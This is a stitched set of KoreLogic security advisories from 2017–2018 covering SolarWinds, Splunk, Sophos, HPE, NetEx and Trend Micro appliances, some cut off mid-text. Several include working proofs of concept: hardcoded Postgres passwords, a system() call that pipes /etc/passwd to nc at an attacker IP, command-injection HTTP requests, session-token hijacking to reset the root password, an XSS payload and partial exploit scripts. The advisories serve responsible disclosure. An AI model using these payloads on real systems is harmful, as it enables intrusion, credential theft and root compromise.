 Attack vector: psql

2. Vulnerability Description

 The Postgres database has default hardcoded credentials.
 While some security measures were taken to ensure that network
 connectivity to the Postgres database wouldn't be possible
 using IPv4, the same measures were not taken for IPv6.

3. Technical Description

 Reviewing netstat for listening services shows that the postgres
 service is bound to both IPv6 and IPv6 interfaces.

 --(0)-[1.3.3.8]-[6.3.1]-[root@swi-lem]--
 / # netstat -apn|grep postgres
 tcp0  0 0.0.0.0:54320.0.0.0:*   LISTEN 
 949/postgres
 tcp6   0  0 :::5432 :::*LISTEN 
 949/postgres
 udp0  0 127.0.0.1:58654 127.0.0.1:58654 
ESTABLISHED 949/postgres
 unix  2  [ ACC ] STREAM LISTENING 4622 949/postgres
/var/run/postgresql/.s.PGSQL.5432

 An iptables REJECT entry exists for IPv4. This prevents remote
 network connectivity.

 --(0)-[1.3.3.8]-[6.3.1]-[root@swi-lem]--
 / # iptables -L|grep postgres
 REJECT tcp  --  anywhere!localhost   tcp 
dpt:postgresql reject-with icmp-port-unreachable

 However, there are no entries in the ip6tables at all, and
 the default policy is ACCEPT.

 --(1)-[1.3.3.8]-[6.3.1]-[root@swi-lem]--
 / # ip6tables -L
 Chain INPUT (policy ACCEPT)
 target prot opt source   destination

 Chain FORWARD (policy ACCEPT)
 target prot opt source   destination

 Chain OUTPUT (policy ACCEPT)
 target prot opt source   destination

 Additionally, two accounts exist with default and simple
 credentials.

 --(0)-[1.3.3.8]-[6.3.1]-[root@swi-lem]--
 / # head -n 5 /usr/local/contego/scripts/database/pgsql/flow.sql
 CREATE ROLE trigeo  WITH CREATEDB LOGIN PASSWORD 'rootme';
 CREATE ROLE contego WITH CREATEDB LOGIN PASSWORD 'reports';

 CREATE DATABASE alertdb WITH OWNER trigeo;
 ALTER DATABASE alertdb OWNER TO trigeo;

 No further testing was conducted against the Postgres
 service. However, the following may be possible.

   1. Connect to Postgres using hardcoded credentials over IPv6.
   2. Run CREATE OR REPLACE FUNCTION which ties to system() in libc.so.6.

   Example: CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS 
/lib/libc.so.6, system LANGUAGE C STRICT;
privSELECT system(cat /etc/passwd | nc 1.3.3.6 8080);
   Example credit: 
http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet

   3. Run system() calls to run commands on the underlying operating system 
as
  the postgres user.

4. Mitigation and Remediation Recommendation

 The vendor has released a Hotfix to remediate this
 vulnerability. Hotfix and installation instructions are
 available at:

 https://thwack.solarwinds.com/thread/111223

5. Credit

 This vulnerability was discovered by Matt Bergin (@thatguylevel)
 of KoreLogic, Inc.

6. Disclosure Timeline

 2017.02.16 - KoreLogic sends vulnerability report and PoC to
  Solarwinds  using PGP key
  with fingerprint
  A86E 0CF6 9665 0C8C 8A7C  C9BA B373 8E9F 951F 918F.
 2017.02.20 - Solarwinds replies that the key is no longer in
  use, requests alternate communication channel.
 2017.02.22 - KoreLogic submits vulnerability report and PoC to
  alternate Solarwinds contact.
 2017.02.23 - Solarwinds confirms receipt of vulnerability
  report.
 2017.04.06 - 30 business days have elapsed since Solarwinds
  acknowledged receipt of vulnerability details.
 2017.04.11 - Solarwinds releases hotfix and public disclosure.
 2017.04.24 - KoreLogic public disclosure.

7. Proof of Concept

 swi-lem$ ifconfig
 eth0  Link encap:Ethernet  HWaddr 52:54:00:12:34:56
   inet addr:192.168.53.76  Bcast:192.168.53.255  Mask:255.255.255.0
   inet6 addr: fe80::5054:ff:fe12:3456/64 Scope:Link
   UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
   RX packets:681 errors:320 dropped:0 overruns:0

KL-001-2017-022 : Splunk Local Privilege Escalation

2017-11-06 Thread KoreLogic Disclosures

KL-001-2017-022 : Splunk Local Privilege Escalation

Title: Splunk Local Privilege Escalation
Advisory ID: KL-001-2017-022
Publication Date: 2017.11.03
Publication URL:
https://www.korelogic.com/Resources/Advisories/KL-001-2017-022.txt

1. Vulnerability Details

Affected Vendor: Splunk
Affected Product: Splunk Enterprise
Affected Version: 6.6.x
Platform: Embedded Linux
CWE Classification: CWE-280: Improper Handling of Insufficient
Permissions or Privileges
Impact: Privilege Escalation
Attack vector: Local

2. Vulnerability Description

Splunk can be configured to run as a non-root user. However,
that user owns the configuration file that specifies the user
to run as, so it can trivially gain root privileges.

3. Technical Description

Splunk runs multiple daemons and network listeners as root
by default. It can be configured to drop privileges to a
specified non-root user at startup such as user splunk, via
the SPLUNK_OS_USER variable in the splunk-launch.conf file in
$SPLUNK_HOME/etc/ (such as /opt/splunk/etc/splunk-launch.conf).

However, the instructions for enabling such a setup call
for chown'ing the entire $SPLUNK_HOME directory to that same
non-root user. For instance:

http://docs.splunk.com/Documentation/Splunk/6.6.2/Installation/RunSplunkasadifferentornon-rootuser

"4. Run the chown command to change the ownership of the splunk
directory and everything under it to the user that you want
to run the software.

chown -R splunk:splunk $SPLUNK_HOME"

Therefore, if an attacker gains control of the splunk account,
they can modify $SPLUNK_HOME/etc/splunk-launch.conf to
remove/unset SPLUNK_OS_USER so that the software will retain
root privileges, and place backdoors under $SPLUNK_HOME/bin/,
etc. that will take malicious actions as user root the next
time Splunk is restarted.

4. Mitigation and Remediation Recommendation

The vendor has published a mitigation for this vulnerability
at: https://www.splunk.com/view/SP-CAAAP3M

5. Credit

This vulnerability was discovered by Hank Leininger of
KoreLogic, Inc.

6. Disclosure Timeline

2017.08.17 - KoreLogic submits vulnerability details to Splunk.
2017.08.17 - Splunk confirms receipt.
2017.08.22 - Splunk notifies KoreLogic that the issue has been
assigned an internal ticket and will be addressed.
2017.09.29 - 30 business days have elapsed since the vulnerability
was reported to Splunk.
2017.10.17 - KoreLogic requests an update from Splunk.
2017.10.18 - Splunk informs KoreLogic that they will issue an advisory
on October 28th.
2017.10.23 - 45 business days have elapsed since the vulnerability
was reported to Splunk.
2017.10.30 - Splunk notifies KoreLogic that the advisory is published.
2017.11.03 - KoreLogic public disclosure.

7. Proof of Concept

See 3. Technical Description.

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt

signature.asc
Description: OpenPGP digital signature

KL-001-2017-020 : Sophos UTM 9 loginuser Privilege Escalation via Insecure Directory Permissions

2017-10-25 Thread KoreLogic Disclosures

KL-001-2017-020 : Sophos UTM 9 loginuser Privilege Escalation via Insecure 
Directory Permissions

Title: Sophos UTM 9 loginuser Privilege Escalation via Insecure Directory 
Permissions
Advisory ID: KL-001-2017-020
Publication Date: 2017.10.24
Publication URL: 
https://www.korelogic.com/Resources/Advisories/KL-001-2017-020.txt


1. Vulnerability Details

 Affected Vendor: Sophos
 Affected Product: UTM 9
 Affected Version: 9.410
 Platform: Embedded Linux
 CWE Classification: CWE-280: Improper Handling of Insufficient
 Permissions or Privileges
 Impact: Root Access
 Attack vector: SSH

2. Vulnerability Description

 The attacker must know the password for the loginuser
 account. The confd client is not available to the loginuser
 account. However, it is possible to list a directory containing
 a sub-directories whose names are valid session identifiers
 (SID) and can be used to make requests on behalf of other
 accounts, such as admin. This allows for escalation to root
 privilege.

3. Technical Description

 1. Obtain the a privileged session token

$ ssh loginuser@1.3.3.7
loginuser@1.3.3.7's password:

Sophos UTM
(C) Copyright 2000-2016 Sophos Limited and others. All rights reserved.
Sophos is a registered trademark of Sophos Limited and Sophos Group.
All other product and company names mentioned are trademarks or 
registered
trademarks of their respective owners.

For more copyright information look at /doc/astaro-license.txt
or http://www.astaro.com/doc/astaro-license.txt

NOTE: If not explicitly approved by Sophos support, any modifications
  done by root will void your support.

loginuser@[redacted]:/home/login > cd /var/confd/var/sessions/
loginuser@[redacted]:/var/confd/var/sessions > ls -la
total 40
drwxr-xr-x 2 root root 4096 Mar 23 14:53 .
drwxr-xr-x 5 root root 4096 Mar 19 16:06 ..
-rw-r--r-- 1 root root  359 Mar 23 14:47 qpmNEByQxJGYYWTvRyVC
-rw-r--r-- 1 root root5 Mar 23 14:47 qpmNEByQxJGYYWTvRyVC.lock
-rw-r--r-- 1 root root  369 Mar 23 14:52 SxAIqVdVmexIEdQYHvHk
-rw-r--r-- 1 root root   35 Mar 23 14:52 SxAIqVdVmexIEdQYHvHk.lock
-rw-r--r-- 1 root root  367 Mar 23 14:47 VbYBGlcwaLVDnzEuFCwP
-rw-r--r-- 1 root root   10 Mar 23 14:47 VbYBGlcwaLVDnzEuFCwP.lock
-rw-r--r-- 1 root root  370 Mar 23 14:47 xZzeOIhVClqKYsmCKHrN
-rw-r--r-- 1 root root5 Mar 23 14:47 xZzeOIhVClqKYsmCKHrN.lock

 2. Set the root password

POST /webadmin.plx HTTP/1.1
Host: 1.3.3.7:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) 
Gecko/20100101 Firefox/52.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.1.1
Content-Type: application/json; charset=UTF-8
Referer: https://1.3.3.7:/
Content-Length: 418
Cookie: SID=xZzeOIhVClqKYsmCKHrN
DNT: 1
Connection: close

{"objs": [{"ack": null, "elements": {"root_pw_1": "newroot", 
"root_pw_2": "newroot", "loginuser_pw_1": "loginuser",
"loginuser_pw_2": "loginuser"}, "FID": "system_settings_shell"}], "SID": 
"xZzeOIhVClqKYsmCKHrN", "browser": "gecko",
"backend_version": "2", "loc": "english", "_cookie": null, "wdebug": 0, "RID": 
"1490305723111_0.8089407793028881",
"current_uuid": "2844879a-e014-11da-b3ae-0014221e9eba", "ipv6": false}

HTTP/1.1 200 OK
Date: Thu, 23 Mar 2017 14:57:19 GMT
Server: Apache
Expires: Thursday, 01-Jan-1970 00:00:01 GMT
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
X-Content-Type-Option: nosniff
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close
Content-Type: application/json; charset=utf-8
Content-Length: 24690


{"SID":"xZzeOIhVClqKYsmCKHrN","ipv6":false,"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba","browser":"gecko","RID":"1490305723111_0.8089407793028881","js":"cache_update();if($(\"topbar_icon\")){$(\"topbar_icon\").src=\"core/img/topbar/topbar_user.png\";}toggle_who_is_watching(0);","backend_version":"2","loc":"english","globals_data":["xZzeOIhVClqKYsmCKHrN","5",[]],"globals":["SID","backend_version","backend_objects_update"],"objs":[{"success":[{"text":"Shell
 user password(s) set 
successfully."}],"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba",
[snip]
"_cookie":null,"wdebug":0}

 3. Look for success message.

"objs":[{"success":[{"text":"Shell user password(s) set successfully."}]

 4. Profit.

loginuser@[redacted]:/home/login > su
Password:
[redacted]:/home/login # id
uid=0(root) gid=0(root) groups=0(root),890(xorp)

4.

KL-001-2018-008 : HPE VAN SDN Unauthenticated Remote Root Vulnerability

2018-06-26 Thread KoreLogic Disclosures

KL-001-2018-008 : HPE VAN SDN Unauthenticated Remote Root Vulnerability

Title: HPE VAN SDN Unauthenticated Remote Root Vulnerability
Advisory ID: KL-001-2018-008
Publication Date: 2018.06.25
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2018-008.txt


1. Vulnerability Details

 Affected Vendor: HP Enterprise
 Affected Product: VAN SDN Controller
 Affected Version: 2.7.18.0503
 Platform: Embedded Linux
 CWE Classification: CWE-798: Use of Hard-coded Credentials,
 CWE-20: Improper Input Validation
 Impact: Privilege Escalation
 Attack vector: HTTP

2. Vulnerability Description

 A hardcoded service token can be used to bypass
 authentication. Built-in functionality can be exploited
 to deploy and execute a malicious deb file containing a
 backdoor. A weak sudoers configuration can then be abused to
 escalate privileges to root. A second issue can be used to
 deny use of the appliance by continually rebooting it.

3. Technical Description

 The exploit will automatically attempt to bypass authentication
 unless the --no-auth-bypass flag is provided. If that flag is
 provided, the --username and --password flags must also be given.

 The options for the --payload flag are: rce-root and
 pulse-reboot. The default option is rce-root. The pulse-reboot
 payload will reboot the target device until the attack is stopped.

 $ python hpevansdn-multiple_exploits.py --help
 HPE VAN SDN Controller 2.7.18.0503
 Unauthenticated Remote Root and Denial-of-Service

 Usage: hpevansdn-multiple_exploits.py [options]

 Options:
   -h, --help   show this help message and exit
   --target=REMOTE_IP   Target IP address
   --no-auth-bypass No authentication bypass
   --username=USERNAME  Username (Default: sdn)
   --password=PASSWORD  Password (Default: skyline)
   --payload=PAYLOADPayload: rce-root(default), pulse-reboot

 Below is output for the rce-root payload:

 $ python hpevansdn-multiple_exploits.py --target 1.3.3.7
 HPE VAN SDN Controller 2.7.18.0503
 Unauthenticated Remote Root and Denial-of-Service

 [+] Authentication successfully bypassed.
 [-] Starting remote root exploit.
 [-] Building backdoor.
 [-] Uploading backdoor.
 [+] Upload successful.
 [-] Installing backdoor.
 [+] Starting backdoor on port 49370.
 [+] Connected to backdoor.
  * For interactive root shell please run 
/var/lib/sdn/uploads/root-V6mlQNqW
 id
 uid=108(sdnadmin) gid=1000(sdn) groups=1000(sdn)
 /var/lib/sdn/uploads/root-V6mlQNqW
 root@medium-hLinux:/opt/sdn/admin# uname -a
 Linux medium-hLinux 4.4.0-2-amd64-hlinux #hlinux1 SMP Thu Jan 28 12:35:26 
UTC 2016 x86_64 GNU/Linux
 root@medium-hLinux:/opt/sdn/admin# exit
 [-] Removing backdoor.
 [+] Backdoor removed.

4. Mitigation and Remediation Recommendation

 The vendor issued the following statement:

 HPE had evaluated the impact of service token being
 leaked and previously updated the security procedure in
 VAN 2.8.8 Admin Guide page 129. The full guide is here -
 http://h20628.www2.hp.com/km-ext/kmcsdirect/emr_na-a3662en_us-1.pdf.

 HPE expects all customers to update their service token,
 admin token, default sdn user password, and edit iptables as
 described in the guideline. If the guideline was followed,
 the exploit would not be successful.

5. Credit

 This vulnerability was discovered by Matt Bergin (@thatguylevel)
 of KoreLogic, Inc.

6. Disclosure Timeline

 2018.02.16 - KoreLogic submits vulnerability details to HPE.
 2018.02.16 - HPE acknowledges receipt.
 2018.04.02 - 30 business days have elapsed since the vulnerability
  was reported to HPE.
 2018.04.23 - 45 business days have elapsed since the vulnerability
  was reported to HPE.
 2018.05.04 - KoreLogic requests an update on the status of the
  remediation.
 2018.05.14 - 60 business days have elapsed since the vulnerability
  was reported to HPE.
 2018.06.05 - 75 business days have elapsed since the vulnerability
  was reported to HPE.
 2018.06.11 - KoreLogic requests an update on the status of the
  remediation.
 2018.06.12 - HPE responds with the statement documented in Section
  4. Mitigation and Remediation Recommendation.
 2018.06.25 - KoreLogic public disclosure.

7. Proof of Concept

 from optparse import OptionParser
 from random import randrange,choice
 from threading import Thread
 from os import mkdir,makedirs,system,listdir,remove
 from string import ascii_letters,digits
 from subprocess import check_output
 from requests import get,post
 from requests.utils import dict_from_cookiejar
 from requests.exceptions import

KL-001-2018-001 : Sophos Web Gateway Persistent Cross Site Scripting Vulnerability

2018-01-29 Thread KoreLogic Disclosures

KL-001-2018-001 : Sophos Web Gateway Persistent Cross Site Scripting 
Vulnerability

Title: Sophos Web Gateway Persistent Cross Site Scripting Vulnerability
Advisory ID: KL-001-2018-001
Publication Date: 2018.01.26
Publication URL: 
https://www.korelogic.com/Resources/Advisories/KL-001-2018-001.txt


1. Vulnerability Details

 Affected Vendor: Sophos
 Affected Product: Web Gateway
 Affected Version: 4.4.1
 Platform: Embedded Linux
 CWE Classification: CWE-79: Improper Neutralization of Input During Web
 Page Generation, CWE-80: Improper Neutralization of
 Script-Related HTML Tags in a Web Page
 Impact: Arbitrary Code Execution
 Attack vector: HTTP

2. Vulnerability Description

 The report scheduler menu within the management portal
 contains a persistent cross site scripting vulnerability. This
 vulnerability can be used to target other users of the same
 portal.

3. Technical Description

 A valid session is required to create the report with the
 persistent cross site scripting payload attached. An example
 attack payload has been included below. This payload is designed
 to trigger an alert box with the number one being displayed.

 POST /index.php?c=report_scheduler HTTP/1.1
 Host: 1.3.3.7
 Accept-Language: en-US,en;q=0.5
 X-Requested-With: XMLHttpRequest
 X-Prototype-Version: 1.6.1
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 Content-Length: 1190
 DNT: 1
 Connection: close


action=save=016a16896568739c11955632068abddd=%5b%7b%22%53%54%59%4c%45%22%3a%20%22%30%31%36%61%31%36%38%39%36%35%36%38%37%33%39%63%31%31%39%35%35%36%33%32%30%36%38%61%62%64%64%64%22%2c%20%22%63%62%5f%74%72%61%66%5f%70%65%72%66%22%3a%20%22%79%65%73%22%2c%20%22%73%62%5f%64%65%74%61%69%6c%65%64%5f%70%6f%6c%69%63%79%5f%63%6f%75%6e%74%22%3a%20%22%31%22%2c%20%22%73%62%5f%67%72%6f%75%70%73%22%3a%20%22%73%6f%70%68%6f%73%5f%73%77%61%5f%61%6c%6c%5f%64%65%70%61%72%74%6d%65%6e%74%73%22%2c%20%22%72%64%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%64%61%69%6c%79%22%2c%20%22%73%62%5f%64%61%79%73%22%3a%20%22%37%22%2c%20%22%73%62%5f%77%65%65%6b%6c%79%5f%64%61%79%22%3a%20%22%4d%6f%6e%64%61%79%22%2c%20%22%74%78%74%5f%73%63%68%65%64%75%6c%65%5f%6e%61%6d%65%22%3a%20%22%74%65%73%74%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3b%3c%2f%73%63%72%69%70%74%3e%22%2c%20%22%63%62%5f%61%63%74%69%76%61%74%65%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%79%65%73%22%2c%20%22%72%65%63%69%70%69%65%6e%74%73%22%3a%20%22%74%65%73%74%40%74%65%73%74%2e%61%73%64%61%73%64%22%2c%20%22%73%63%68%65%64%75%6c%65%5f%69%64%22%3a%20%22%64%47%56%7a%64%41%3d%3d%22%2c%20%22%6f%77%6e%65%72%22%3a%20%22%61%64%6d%69%6e%22%7d%5d


 HTTP/1.1 200 OK
 Date: Sat, 29 Jul 2017 16:05:25 GMT
 Server: Apache
 Cache-Control: no-store, no-cache, must-revalidate, private, 
post-check=0, pre-check=0
 Pragma: no-cache
 X-Frame-Options: sameorigin
 X-Content-Type-Options: nosniff
 Connection: close
 Content-Type: text/html; charset=utf-8
 Content-Length: 41

 {"status":0,"statusMsg":"Settings saved"}


 The URL-encoded input being passed in input parameter can be
 decoded to a array containing a single JSON buffer.


 [{"STYLE": "016a16896568739c11955632068abddd", "cb_traf_perf": "yes", 
"sb_detailed_policy_count": "1",
"sb_groups": "sophos_swa_all_departments", "rd_schedule": "daily", "sb_days": 
"7", "sb_weekly_day": "Monday",
"txt_schedule_name": "testalert(1);", "cb_activate_schedule": 
"yes", "recipients": "test@test.asdasd",
"schedule_id": "dGVzdA==", "owner": "admin"}]


 Within the JSON buffer is a key called txt_schedule_name. The
 value for this key is the name of the scheduled report. This
 value is included in the report schedule list.


 "txt_schedule_name": "testalert(1);"

 The HTML tags are then stored.  When the report schedule is
 viewed, the resulting JSON is sent as content-type text/html
 instead of application/json, causing the browser to execute any
 unescaped javascript it contains.  The output is HTML-encoded
 with the exception of the txt_schedule_name: value which is
 not sanitized, and the payload triggers.


 POST /index.php?c=report_scheduler HTTP/1.1
 Host: 1.3.3.7
 Accept: text/javascript, text/html, application/xml, text/xml, */*
 Accept-Language: en-US,en;q=0.5
 X-Requested-With: XMLHttpRequest
 X-Prototype-Version: 1.6.1
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 Content-Length: 81
 DNT: 1
 Connection: close

 
action=load=name=asc=016a16896568739c11955632068abddd


 HTTP/1.1 200 OK
 Date: Sat, 29 Jul 2017 16:06:38 GMT
 Server: Apache
 Cache-Control: no-store, no-cache, must-revalidate, private,

KL-001-2018-004 : NetEx HyperIP Privilege Escalation Vulnerability

KL-001-2018-004 : NetEx HyperIP Privilege Escalation Vulnerability

Title: NetEx HyperIP Privilege Escalation Vulnerability
Advisory ID: KL-001-2018-004
Publication Date: 2018.02.08
Publication URL: 
https://www.korelogic.com/Resources/Advisories/KL-001-2018-004.txt


1. Vulnerability Details

 Affected Vendor: NetEx
 Affected Product: HyperIP
 Affected Version: 6.1.0
 Platform: Embedded Linux
 CWE Classification: CWE-592: Authentication Bypass Issues
 Impact: Privilege Escalation
 Attack vector: HTTPS

2. Vulnerability Description

 Privileges can be escalated by abusing writable paths found
 within the sudoers configuration file.

3. Technical Description

 The run script is modified with the attack payload.

   POST /hypmisc.php HTTP/1.1
   Host: 1.3.3.7
   Accept-Language: en-US,en;q=0.5
   Cookie: auth-token=b6b73844ce4df64f459948c5475a1096
   DNT: 1
   Connection: close
   Upgrade-Insecure-Requests: 1
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 90

   set_id=msglvl_val=$(echo /usr/bin/id >> 
/var/ftp/pub/updates/a.run)=on=Set

   HTTP/1.1 200 OK
   Date: Mon, 27 Mar 2017 07:21:38 GMT
   Server: Apache/2.2.3 (CentOS)
   X-Powered-By: PHP/5.1.6
   Expires: Thu, 19 Nov 1981 08:52:00 GMT
   Cache-Control: no-store, no-cache, must-revalidate, post-check=0, 
pre-check=0
   Pragma: no-cache
   Content-Length: 1048
   Connection: close
   Content-Type: text/html; charset=UTF-8

 The attack payload can now be executed.

   POST /hypmisc.php HTTP/1.1
   Host: 1.3.3.7
   Accept-Language: en-US,en;q=0.5
   Cookie: auth-token=b6b73844ce4df64f459948c5475a1096
   DNT: 1
   Connection: close
   Upgrade-Insecure-Requests: 1
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 91

   set_id=msglvl_val=$(sudo /var/ftp/pub/updates/a.run >> 
/tmp/a.output)=on=Set

   HTTP/1.1 200 OK
   Date: Mon, 27 Mar 2017 13:06:55 GMT
   Server: Apache/2.2.3 (CentOS)
   X-Powered-By: PHP/5.1.6
   Expires: Thu, 19 Nov 1981 08:52:00 GMT
   Cache-Control: no-store, no-cache, must-revalidate, post-check=0, 
pre-check=0
   Pragma: no-cache
   Content-Length: 1020
   Connection: close
   Content-Type: text/html; charset=UTF-8

 The output can now be read from the a.output file, which is a
 separate arbitrary file read issue detailed in KL-001-2018-005.

   GET /logs.php?system=../../tmp/a.output=Show+System+Log HTTP/1.1
   Host: 1.3.3.7
   Accept-Language: en-US,en;q=0.5
   DNT: 1
   Connection: close
   Upgrade-Insecure-Requests: 1

   HTTP/1.1 200 OK
   Date: Mon, 27 Mar 2017 13:07:51 GMT
   Server: Apache/2.2.3 (CentOS)
   X-Powered-By: PHP/5.1.6
   Content-Length: 502
   Connection: close
   Content-Type: text/html; charset=UTF-8

   
   
   
   
   
   

   Show System Log  [ Monday @ 08:07:51 ]
   uid=0(root) gid=0(root) 
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
   
   
   

4. Mitigation and Remediation Recommendation

 The vendor has released version 6.1.1 of HyperIP, which they state
 addresses this vulnerability.

5. Credit

 This vulnerability was discovered by Matt Bergin (@thatguylevel)
 of KoreLogic, Inc.

6. Disclosure Timeline

 2017.07.24 - KoreLogic submits vulnerability details to NetEx.
 2017.07.24 - NetEx confirms receipt.
 2017.08.16 - NetEx informs KoreLogic that this and other reported
  vulnerabilities have been addressed in the forthcoming
  release. ETA as of yet undetermined.
 2017.09.05 - 30 business days have elapsed since the vulnerability
  was reported to NetEx.
 2017.09.19 - NetEx informs KoreLogic that the forthcoming release
  6.1.1 is expected to ship at the end of January 2018.
 2017.09.26 - 45 business days have elapsed since the vulnerability
  was reported to NetEx.
 2017.12.01 - 90 business days have elapsed since the vulnerability
  was reported to NetEx.
 2018.01.17 - 120 business days have elapsed since the vulnerability
  was reported to NetEx.
 2018.01.23 - NetEx notifies KoreLogic that the HyperIP 6.1.1 release
  has gone live.
 2018.02.08 - KoreLogic public disclosure.

7. Proof of Concept

 See 3. Technical Description.


The contents of this advisory are copyright(c) 2018
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team

KL-001-2018-006 : Trend Micro IMSVA Management Portal Authentication Bypass

KL-001-2018-006 : Trend Micro IMSVA Management Portal Authentication Bypass

Title: Trend Micro IMSVA Management Portal Authentication Bypass
Advisory ID: KL-001-2018-006
Publication Date: 2018.02.08
Publication URL: 
https://www.korelogic.com/Resources/Advisories/KL-001-2018-006.txt


1. Vulnerability Details

 Affected Vendor: Trend Micro
 Affected Product: InterScan Mail Security Virtual Apppliance
 Affected Version: 9.1.0.1600
 Platform: Embedded Linux
 CWE Classification: CWE-522: Insufficiently Protected Credentials, 
CWE-219: Sensitive Data Under Web Root
 Impact: Authentication Bypass
 Attack vector: HTTPS

2. Vulnerability Description

 Any unauthenticated user can bypass the authentication process.

3. Technical Description

 The web application is plugin-based and allows widgets to
 be loaded into the application. A plugin which is loaded by
 default stores a log file of events in a directory which can be
 accessed by unauthenticated users. Files within this directory
 (such as /widget/repository/log/diagnostic.log) which contain
 cookie values can then be read, parsed, and session information
 extracted. A functional exploit is shown below.

4. Mitigation and Remediation Recommendation

 Trend Micro has released a Critical Patch update to the
 affected versions for this vulnerability. The advisory and
 links to the patch(es) are available from the following URL:

 https://success.trendmicro.com/solution/1119277

5. Credit

 This vulnerability was discovered by Matt Bergin (@thatguylevel)
 of KoreLogic, Inc.

6. Disclosure Timeline

 2017.08.11 - KoreLogic submits vulnerability details to Trend Micro.
 2017.08.11 - Trend Micro confirms receipt.
 2017.09.15 - KoreLogic asks for an update on the triage of the
  reported issue.
 2017.09.15 - Trend Micro informs KoreLogic that the issue is in
  remediation but there is no expected release date yet.
 2017.09.25 - 30 business days have elapsed since the vulnerability
  was reported to Trend Micro.
 2017.10.06 - Trend Micro informs KoreLogic that the issue will not
  be addressed before the 45 business-day deadline. They
  ask for additional time for the details to remain
  embargoed in order to complete QA on the proposed fix.
 2017.10.06 - KoreLogic agrees to extend the disclosure timeline.
 2017.10.17 - 45 business days have elapsed since the vulnerability
  was reported to Trend Micro.
 2017.11.02 - Trend Micro notifies KoreLogic that the Critical Patch
  for IMSVA 9.1 (Critical Patch 1682) has gone live,
  but they are still working on the patch for IMSVA 9.0.
 2017.11.07 - 60 business days have elapsed since the vulnerability
  was reported to Trend Micro.
 2017.12.21 - 90 business days have elapsed since the vulnerability
  was reported to Trend Micro.
 2017.12.28 - Trend Micro notifies KoreLogic that the IMSVA 9.0
  Critical Patch is being localized for foreign language
  customers. Expected release date is late January 2018.
 2018.01.18 - Trend Micro notifies KoreLogic that the expected release
  date for the IMSVA 9.0 Critical Patch and the advisory
  is to be January 31, 2018.
 2018.01.23 - 110 business days have elapsed since the vulnerability
  was reported to Trend Micro.
 2018.01.31 - Trend Micro releases the advisory associated with this
  vulnerability and the related Critical Patches.
 2018.02.08 - KoreLogic public disclosure.

7. Proof of Concept

#!/usr/bin/python3


from argparse import ArgumentParser
from ssl import _create_unverified_context
from time import mktime
from urllib.request import HTTPSHandler, HTTPError, Request, urlopen, 
build_opener


banner = '''Trendmicro IMSVA 9.1.0.1600 Management Portal Authentication Bypass
{}'''.format('-'*67)


class Exploit:
def __init__(self, args):
self.target_host = args.host
self.target_port = args.port
self.list_all = args.ls
self.sessions = []
self.session_latest_time = None
self.session_latest_id = None
self.sessions_active = []
return None

def is_target(self):
url_loginpage = 
Request('https://{}:{}/loginPage.imss'.format(self.target_host, 
self.target_port))
url_loginjsp = 
Request('https://{}:{}/jsp/framework/login.jsp'.format(self.target_host, 
self.target_port))
if urlopen(url_loginpage, 
context=_create_unverified_context()).getcode() == 200:
try:
urlopen(url_loginjsp, context=_create_unverified_context())
except HTTPError as e:
if e.code == 403:
return True
else:

KL-001-2018-005 : NetEx HyperIP Local File Inclusion Vulnerability

KL-001-2018-005 : NetEx HyperIP Local File Inclusion Vulnerability

Title: NetEx HyperIP Local File Inclusion Vulnerability
Advisory ID: KL-001-2018-005
Publication Date: 2018.02.08
Publication URL: 
https://www.korelogic.com/Resources/Advisories/KL-001-2018-005.txt


1. Vulnerability Details

 Affected Vendor: NetEx
 Affected Product: HyperIP
 Affected Version: 6.1.0
 Platform: Embedded Linux
 CWE Classification: CWE-73: External Control of File Name or Path, 
CWE-592: Authentication Bypass Issues
 Impact: Arbitrary Filesystem Reads
 Attack vector: HTTPS

2. Vulnerability Description

 Local files can be included within the HTTP response given
 by logs.php

3. Technical Description

 Any arbitrary file, such as the one created in KL-001-2018-004, can
 be returned by the logs.php script.

   GET /logs.php?system=../../tmp/a.output=Show+System+Log HTTP/1.1
   Host: 1.3.3.7
   Accept-Language: en-US,en;q=0.5
   DNT: 1
   Connection: close
   Upgrade-Insecure-Requests: 1

   HTTP/1.1 200 OK
   Date: Mon, 27 Mar 2017 13:07:51 GMT
   Server: Apache/2.2.3 (CentOS)
   X-Powered-By: PHP/5.1.6
   Content-Length: 502
   Connection: close
   Content-Type: text/html; charset=UTF-8

   
   
   
   
   
   

   Show System Log  [ Monday @ 08:07:51 ]
   uid=0(root) gid=0(root) 
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
   
   
   

4. Mitigation and Remediation Recommendation

 The vendor has released version 6.1.1 of HyperIP, which they state
 addresses this vulnerability.

5. Credit

 This vulnerability was discovered by Matt Bergin (@thatguylevel)
 of KoreLogic, Inc.

6. Disclosure Timeline

 2017.07.24 - KoreLogic submits vulnerability details to NetEx.
 2017.07.24 - NetEx confirms receipt.
 2017.08.16 - NetEx informs KoreLogic that this and other reported
  vulnerabilities have been addressed in the forthcoming
  release. ETA as of yet undetermined.
 2017.09.05 - 30 business days have elapsed since the vulnerability
  was reported to NetEx.
 2017.09.19 - NetEx informs KoreLogic that the forthcoming release
